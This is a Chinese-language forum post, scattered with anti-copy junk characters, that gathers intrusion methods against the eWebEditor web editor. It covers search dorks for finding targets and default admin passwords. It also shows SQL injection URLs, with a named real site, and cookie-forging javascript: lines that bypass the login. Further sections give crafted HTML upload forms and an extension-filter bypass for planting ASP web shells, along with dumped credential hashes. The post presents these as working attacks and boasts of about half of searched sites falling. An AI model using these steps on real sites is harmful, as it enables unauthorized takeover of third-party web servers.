eWebEditor.asp?id=45&style=standard1 样式调用
8 K3 V! z l" l- y# T' z, V4 J9 ~+ s( L6 Y. j( k: W
2 M0 }: [% X) H! N/ v/edit/admin_uploadfile.asp?id=14&dir=../../..
8 H3 s( r8 q8 j! K# }/ Z可以浏览网站目录 ../自己加或者减0 O1 w5 D* a, x V$ u) ^7 j; u
5 G3 I/ e) s. j* u9 c
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
5 n5 ^; R+ T' }5 ?' U7 N简单利用就是
# A/ D( x: J+ Ehttp://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
& Q1 v2 m1 D! R3 D, fhttp://www.siqinci.com/ewebedito ... amp;style=full_v200
, j1 s6 n A+ }可以利用nbsi进行猜解,对此进行注入3 h* F/ R- w3 e, R
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
7 m9 t/ r6 ^( ^; ]这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
5 D+ ^" A7 g7 P C2 g. j在action下面& f* N: z3 S0 U- J" N
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">: g/ X8 a2 h) H; {; M3 V c( c9 W4 Q
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
# X$ |( |1 G$ s<input type="submit" name="uploadfile" value="提交">
' ^; ]5 h3 {6 S& v0 Q6 f<input type=hidden name=originalfile value="">
9 F% j% z. a1 Q' d( N; D</form>
% _0 L$ B8 l' @8 q9 a& [% P" x- W6 m------------------------------------------------------------------------------------------------------------------------------------------------
7 a/ a2 J4 p0 P2 U4 K3 }<input type="submit" name="uploadfile" value="提交"> 放在action后头# w R. B C. `0 u# ?% Z. @
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。- W _1 D; b6 m7 A+ w2 h
) P+ b1 p" g6 _+ `5 z
; h& \$ u1 G; a, ]/ Q9 y
3 o; E: G2 U; M5 E# Z! B+ @" u$ g, e8 M( H5 I" I. J9 p& i7 z
Ewebeditor最新漏洞及漏洞大全[收集] (图)
4 V& G% z7 t3 G本帖最后由 administrator 于 2009-7-7 21:24 编辑
0 Y& J9 J' f: ~, c* W9 u
1 r, w# c! q3 E) N, O' C6 U0 X以下文章收集转载于网络
% v; I& o0 N# z/ v! M" i' n: T#主题描述# ewebeditor 3.8漏洞[php]
8 L8 b7 K& m! i0 u3 C' |9 n0 T--------------------------------------------------------------------------------------------
1 {7 [, @$ f, `; Z#内容#
; B0 ^/ I$ {4 O: X2 L( |! Uphp版ewebeditor 3.8的漏洞# p7 C7 \, ], n8 B
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:- C# X! j7 P& l' c% E
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
2 O# d6 P, S Q8 I' b2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
3 {9 V& e2 J9 D4 c9 K- ?9 r3 后面的利用和asp一样,新增样式修改上传,就ok了
( V# l& a1 `) R6 S: Q测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
) G1 \0 P4 P8 p: iaspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell2 ?+ i) ?5 p+ N, w0 n- w& l' V
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
0 X* i1 e9 @$ c! F0 O--------------------------------------------------------------------------------------------$ {0 @4 G o N6 I2 q% \
" [: G1 Z- v$ A2 O/ I; V2 q2 T h/ s
s* a0 V4 _/ p5 ~+ r" r. M+ D算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
6 Z1 o9 v9 x; k( j- o
$ o. V. ?# a6 |" u; t- w4 ^6 U漏洞更新日期TM: 2009 2 9日 转自zake’S Blog! n. g* z" G- u/ b! q; u6 y1 k" {
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
7 ~+ K7 l- `% k d/ a m0 E# B, @, J那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址
5 k! W7 x1 d/ x/ [% b7 v$ Y3 W, N/ B$ H6 s" S/ m1 L
' `& i( E" `' k
然后确定以后,这里是最关键的一部! \ v) V8 l* M$ d7 y+ O& p4 {
这里点了远程上传以后,再提交得到木马地址9 H; N0 g& Q8 U& N, W6 ^( U2 D, ?3 u
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限6 a, t2 h8 \. O
属于安全检测漏洞版本ewebeditor v6.0.0* d" ^/ B* e1 X/ O( g6 r! X! e
* A# i5 N" _: E以前的ewebeditor漏洞:* f5 @9 o+ Y7 Q$ s* `' d, ^) V; e
+ r" ?9 o+ n6 I, sewebeditor注入漏洞. p8 B( A) e3 ]8 U, h0 |7 G
2 i T) E* z# K
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb) X: m! u: D+ u
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
$ u0 z1 M4 `* c; f: p3 D0 G& w今天我给大家带来的也是ewebeditor编辑器的入侵方法3 f" r+ N( L" g# L4 ~
不过一种是注入,一种是利用upload.asp文件,本地构造
+ t- w5 V3 J7 S/ B* O r$ WNO1:注入6 N P) x% F% X: @; [. j* @; `
http://www.XXX.com/ewebeditor200 ... amp;style=full_v200
. t4 _- {- t" z: [" R编辑器ewebedior7以前版本通通存在注入9 b* }9 d& S5 e: o
直接检测不行的,要写入特征字符: s9 r2 p( W( w5 H* \
我们的工具是不知道ewebeditor的表名的还有列名
! J8 |, ~; A% W0 b0 k我们自己去看看
% Q+ X# c* u$ f哎。。先表吧1 }+ B, J' z4 H
要先添加进库
5 ^* B* z8 s8 S. s开始猜账号密码了
; c$ S0 L( m. G) Q. s5 |- o' ?! u我们==
3 R3 g' N9 [" B& `心急的往后拉# @3 ~5 S- o' }: Y% A
出来了& S: H p! n( K, G( s# G
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
& H: |5 w$ A/ \# p' u: ?对吧^_^" ]7 h3 y0 O3 A1 t: K, P
后面不说了
5 H( d Y, X6 p" a% N9 p$ ^4 h1 ?" ?9 wNO2:利用upload.asp文件,本地构造上传shell
7 h2 M& K9 J6 s+ q- q大家看这里
* J! L9 X, W R7 d3 L% f% Rhttp://www.siqinci.com/ewebedito ... lepreview&id=37
( d1 @" j C3 J) K3 z. d如果遇见这样的情况又无法添加工具栏是不是很郁闷
' }4 @" G/ p- y6 H2 \2 L现在不郁闷了,^_^源源不一般/ K: r, U9 C, P+ w6 g
我们记录下他的样式名“aaa”
3 S" j S' }' Q我已经吧upload.asp文件拿出来了
: k, z1 ]0 {% H5 f我们构造下/ j# {5 {6 v/ B8 n; C6 e" v
OK,我之前已经构造好了+ v3 z1 a" j+ o3 J
其实就是这里
" B+ u5 M( j) M- s: w; }<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
9 ^2 _$ X. {8 R; | [<input type=file name=uploadfile size=1 style=”width:100%”>- a+ I# |0 x' Q+ d4 B4 _
<input type=submit value=”上传了”></input> a( b" B- A3 R' h7 v/ T9 G5 o
</form>* W# Z" H. ?1 Q/ q( t m3 P. d* j
下面我们运行他上传个大马算了
* W6 b( G/ y1 O) X* sUploadFile上传进去的在这个目录下0 ]& C' L$ w. e) x B# n. A2 P T
2008102018020762.asa
6 }: g4 L. g+ ~+ F4 Z' g5 H) r, E* }7 B$ N1 O0 G1 @
过往漏洞:
* B/ b A! Q# R0 q" B
( [- l, ?: Y) n2 K- l9 I首先介绍编辑器的一些默认特征:! u. R E: I$ e$ }2 ~) k1 H
默认登陆admin_login.asp$ f. \, \- C! Z" W% c1 `. r" \% q6 I
默认数据库db/ewebeditor.mdb
0 T2 d, r4 A5 a( V默认帐号admin 密码admin或admin888
' V" v6 Z0 F/ m( X- A! j搜索关键字:”inurl:ewebeditor” 关键字十分重要4 |7 ?' @" l$ u
有人搜索”eWebEditor - eWebSoft在线编辑器”2 l7 n8 Z. w$ M' U, b2 G
根本搜索不到几个~' K7 `4 y: e) a' j1 x
baidu.google搜索inurl:ewebeditor
: A. N+ o& \+ |7 P3 Z几万的站起码有几千个是具有默认特征的~) z9 E( t' g/ c( o; I9 F0 k# P) m
那么试一下默认后台* P: S, K8 i: k$ y# L" G# I
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp( S' e \9 m: |' b E
试默认帐号密码登陆。
1 @7 K, E, Q! l利用eWebEditor获得WebShell的步骤大致如下:4 _! S2 J' U k/ J# p
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
3 `7 x7 J! x& j! S4 c2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。5 q. f3 B9 v p" d
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。/ I* k7 c/ h0 u5 {1 ?9 w# t
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!8 t- E r. ]- w
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。7 d+ v" p7 R* T
然后在上传的文件类型中增加“asa”类型。
$ |8 ]) z# `4 ?1 Z ]% g; r* W5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
U* p) X* M6 g4 @) j漏洞原理
$ W7 r7 K( Y6 _$ w: X% a3 W漏洞的利用原理很简单,请看Upload.asp文件:
5 D1 g, F% V. V& M; o# S任何情况下都不允许上传asp脚本文件& P- I# Z, V3 D6 V: o9 ^* i3 z
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)1 K: l6 }& V! H
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!$ R! }; r+ ]# r! T
高级应用
1 F! y* d9 m& m+ a ?eWebEditor的漏洞利用还有一些技巧:( A, ?( W3 ?9 d2 K# _
1.使用默认用户名和密码无法登录。' w. \$ P1 ]& O! \0 b" T
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
& v" h* l# d* Y- w- j2.加了asa类型后发现还是无法上传。
4 L( Y" i, x5 _5 T9 h% ]# V# V应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
. a# a1 C8 M) F7 x$ V5 Q3 ]! ^sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)7 m) Z6 b8 }, o9 _: p% p+ o
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
& E) T1 H7 ^9 A6 m' h B3.上传了asp文件后,却发现该目录没有运行脚本的权限。6 j1 ?. x5 U* N+ A3 R. ^- K
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
2 i' @( M( E* Q4.已经使用了第2点中的方法,但是asp类型还是无法上传。. Q3 T+ e! w9 z- X$ h; _4 g2 ^
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。% T; X! ~6 ^ y5 d- w- p
后记
7 r: P( A z, ~0 ]% {根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!' G/ f- i+ |5 r# Z6 g# C x
基本入侵基础漏洞% h& ~0 B+ s$ A" i
eWebEditor 漏洞
2 D% V3 l2 J( R. R4 e Y
. ?2 i) |) c- U各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!
1 a! u( {8 E9 S9 B* J9 s4 y/ c6 a
漏洞利用4 B; M5 ]; [; J# ~! p
利用eWebEditor获得WebShell的步骤大致如下:* V# [9 o( q% r( {8 { Y* n4 A' I; f
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
" g4 Q1 O Q* j8 W2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。: W. x4 ~, t$ ~2 H$ u9 w
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
! r( f3 _1 p* ^% [如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
1 G; l, o0 ?3 J% Q8 b4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。$ i7 i, T( F# B( y* y# b
1 p8 i! h; G' L) h" @, G
然后在上传的文件类型中增加“asa”类型。
/ d; P# z1 u5 X H6 a5 {
, n9 H: F/ I- @( a. Q: _' ]! k' T5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
$ I: ^- i9 f1 N' u, m3 ~' K W
- J% O) v6 W& @: r& D( N. ]/ G( E- E3 L3 f* L) M
漏洞原理
; l. `' \7 B( W9 B! g& O0 y' m漏洞的利用原理很简单,请看Upload.asp文件:8 g& R% w$ I2 L9 B: T# u# d
任何情况下都不允许上传asp脚本文件) s( o* O. i! K" m
sAllowExt = replace(UCase(sAllowExt), "ASP", "")" j, Y% g& P' O$ I
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!' v8 r M7 [' J$ D9 X
0 a! O4 m: Q0 }+ Z7 d高级应用& ?) t& d, M. m- e" H
eWebEditor的漏洞利用还有一些技巧:7 E* Z5 C+ b5 |. ?
1.使用默认用户名和密码无法登录。( C6 e3 @' i0 z: {/ T
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。4 B y7 m7 C/ r
2.加了asa类型后发现还是无法上传。2 `+ @- d$ b5 p' V" K" U
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:/ Z' ?' y# P \8 |
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
9 s; e) m7 d4 i- q* f& ]$ C% u猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
- K6 K0 }! `8 S; G! t3.上传了asp文件后,却发现该目录没有运行脚本的权限。
9 U; I: k9 C# S# U8 c, ~呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。8 A. I2 O. f! W# J6 Q+ U
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
) D0 u% m$ M, z; Q" \3 B+ D! Q看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
! W2 V- o) W0 L$ N6 Q: F& {) X' }& ~: [1 r3 I+ |) |
后记
4 ~* S3 j0 b. v$ e% O; Y/ ?根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对